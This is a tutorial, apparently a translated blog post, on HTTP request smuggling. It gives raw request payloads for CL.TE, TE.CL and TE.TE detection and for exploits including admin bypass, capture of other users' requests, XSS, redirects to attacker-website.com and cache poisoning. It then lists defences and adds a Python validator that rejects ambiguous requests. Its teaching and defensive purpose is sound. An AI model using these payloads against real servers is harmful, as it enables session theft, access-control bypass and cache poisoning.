Request Smuggling Exploitation in Practice: The One-Stop Guide
Word count: 951 | 2025-08-19 12:42:28
A Comprehensive Guide to HTTP Request Smuggling Attacks
1. Overview of HTTP Request Smuggling
HTTP request smuggling is a technique for interfering with the way a website processes sequences of HTTP requests. It lets an attacker bypass security controls, gain access to sensitive data, and compromise other users. The attack arises mainly when the front-end server and the back-end server interpret the data sent by a client differently.
1.1 Basic Principle
The HTTP specification provides two ways to specify where a request ends:
- Content-Length: states the length of the request or response message body in bytes
- Transfer-Encoding: indicates that the message body uses chunked encoding
When both headers are present in a request and the front-end and back-end servers handle them inconsistently, a request smuggling vulnerability results.
1.2 Related Protocol Features
- Pipelining: allows multiple HTTP requests to be sent over a single TCP connection without waiting for the responses
- Persistent connections (Keep-Alive): allow multiple HTTP requests and responses to be exchanged over a single TCP connection
2. Types of Request Smuggling
2.1 CL.TE Vulnerabilities
The front-end server uses the Content-Length header while the back-end server uses the Transfer-Encoding header.
Attack example:
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED
2.2 TE.CL Vulnerabilities
The front-end server uses the Transfer-Encoding header while the back-end server uses the Content-Length header.
Attack example:
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 3
Transfer-Encoding: chunked

8
SMUGGLED
0

2.3 TE.TE Vulnerabilities
Both the front-end and back-end servers support the Transfer-Encoding header, but one of them can be induced not to process it by obfuscating the header.
Obfuscation examples:
Transfer-Encoding: xchunked
Transfer-Encoding: chunked
Transfer-Encoding: x
Transfer-Encoding:[tab]chunked[space]
Transfer-Encoding: chunked
X: X[\n]Transfer-Encoding: chunked
3. Detection Methods
3.1 Timing-Based Detection
In both probes below the front-end forwards only the part of the body it considers complete, leaving the back-end waiting for bytes that never arrive; the resulting delay reveals the inconsistency.
CL.TE detection:
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
Content-Length: 4

1
A
X
TE.CL detection:
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
Content-Length: 6

0

X
3.2 Response-Based Detection
CL.TE detection:
POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Transfer-Encoding: chunked

e
q=smuggling&x=
0

GET /404 HTTP/1.1
Foo: x
TE.CL detection:
POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked

7c
GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 144

x=
0

4. Exploitation Scenarios
4.1 Bypassing Front-End Restrictions
Example:
POST /home HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: vulnerable-website.com
Foo: xGET /home HTTP/1.1
Host: vulnerable-website.com
4.2 Exploiting Front-End Request Rewriting
Detecting the rewriting:
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 130
Transfer-Encoding: chunked

0

POST /login HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

email=POST /login HTTP/1.1
Host: vulnerable-website.com
4.3 Bypassing Client Authentication
Example:
POST /example HTTP/1.1
Host: vulnerable-website.com
Content-Type: x-www-form-urlencoded
Content-Length: 64
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
X-SSL-CLIENT-CN: administrator
Foo: x
4.4 Unauthorized Operations
Capturing other users' requests:
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
Content-Length: 330

0

POST /post/comment HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 400
Cookie: session=BOe1lFDosZ9lk7NLUpWcG8mjiwbeNZAO

csrf=SmsWiwIJ07Wg5oqX87FfUVkMThn9VzO0&postId=2&name=Carlos+Montoya&email=carlos%40normal-user.net&website=https%3A%2F%2Fnormal-user.net&comment=
4.5 Exploiting Reflected XSS
Example:
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 63
Transfer-Encoding: chunked

0

GET / HTTP/1.1
User-Agent: <script>alert(1)</script>
Foo: X
4.6 Redirect Attacks
Example:
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 54
Transfer-Encoding: chunked

0

GET /home HTTP/1.1
Host: attacker-website.com
Foo: X
4.7 Web Cache Poisoning
Example:
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 59
Transfer-Encoding: chunked

0

GET /home HTTP/1.1
Host: attacker-website.com
Foo: XGET /static/include.js HTTP/1.1
Host: vulnerable-website.com
4.8 Web Cache Deception
Example:
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 43
Transfer-Encoding: chunked

0

GET /private/messages HTTP/1.1
Foo: X
5. Defensive Measures
- Disable connection reuse between the front-end server and the back-end server
- Use HTTP/2 end to end and disable HTTP downgrading
- Have the front-end server normalize ambiguous requests
- Have the back-end server reject ambiguous requests and close the connection
- Use exactly the same web server software for all servers that handle application-layer messages
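As an added example (not code from the original post), the following Python implements the "reject ambiguous requests" measure from the list above against the CL/TE combinations of sections 2.1 and 2.2 and the Transfer-Encoding obfuscations of section 2.3. It goes a little beyond the page by also rejecting non-token header names and conflicting Content-Length values; the sample requests are constructed, the host name is the page's placeholder, and only the request head is inspected.

```python
import re

# RFC 7230 'token' characters: the only ones allowed in a header name.
TOKEN = re.compile(rb"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")
# Control characters that must never appear in a header value (tab excepted).
CTL = re.compile(rb"[\x00-\x08\x0a-\x1f\x7f]")


def check_framing(raw: bytes) -> str:
    """Return 'ok' or 'reject: <reason>' for one raw HTTP/1.1 request (head only)."""
    head = raw.split(b"\r\n\r\n", 1)[0]               # request line + headers
    cl_values, te_codings = [], []
    for line in filter(None, head.split(b"\r\n")[1:]):  # skip the request line
        if line[:1] in (b" ", b"\t"):
            return "reject: obsolete line folding"
        name, sep, value = line.partition(b":")
        if not sep or not TOKEN.fullmatch(name):
            return "reject: malformed header name"       # e.g. 'Transfer-Encoding :'
        if CTL.search(value):
            return "reject: control character in header value"  # the X: X[\n]... variant
        value = value.strip(b" \t")
        if name.lower() == b"content-length":
            cl_values.append(value)
        elif name.lower() == b"transfer-encoding":
            te_codings += [c.strip().lower() for c in value.split(b",")]
    if cl_values and te_codings:
        return "reject: both Content-Length and Transfer-Encoding present"  # CL.TE / TE.CL
    if len(set(cl_values)) > 1:
        return "reject: conflicting Content-Length values"
    if cl_values and not cl_values[0].isdigit():
        return "reject: non-numeric Content-Length"
    if te_codings and te_codings != [b"chunked"]:
        return "reject: Transfer-Encoding is not exactly 'chunked'"  # xchunked, 'x' + chunked
    return "ok"


def build_request(*headers: bytes) -> bytes:
    """Constructed sample: a POST head with the given headers and a minimal chunked body."""
    extra = b"".join(h + b"\r\n" for h in headers)
    return b"POST / HTTP/1.1\r\nHost: vulnerable-website.com\r\n" + extra + b"\r\n0\r\n\r\n"


# Constructed probes modelled on sections 2.1 and 2.3; bodies are not inspected.
CL_TE = build_request(b"Content-Length: 13", b"Transfer-Encoding: chunked")
TE_XCHUNKED = build_request(b"Transfer-Encoding: xchunked")
TE_BARE_LF = build_request(b"X: X\nTransfer-Encoding: chunked")
TE_OWS = build_request(b"Transfer-Encoding:\tchunked ")   # legal whitespace, unambiguous alone
PLAIN_CL = build_request(b"Content-Length: 5")

if __name__ == "__main__":
    for label, req in {"CL.TE": CL_TE, "xchunked": TE_XCHUNKED, "bare LF": TE_BARE_LF, "OWS": TE_OWS, "plain CL": PLAIN_CL}.items():
        print(f"{label:9s} -> {check_framing(req)}")
```

A back-end applying this policy should also close the connection on every reject, as the list above says, so that bytes the front-end has already queued cannot be reinterpreted as a second request.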
6. Summary
HTTP request smuggling exploits inconsistencies in how servers process HTTP requests and can lead to a range of security risks. The key to defence is to ensure that the front-end and back-end servers handle requests consistently and to enforce strict request validation.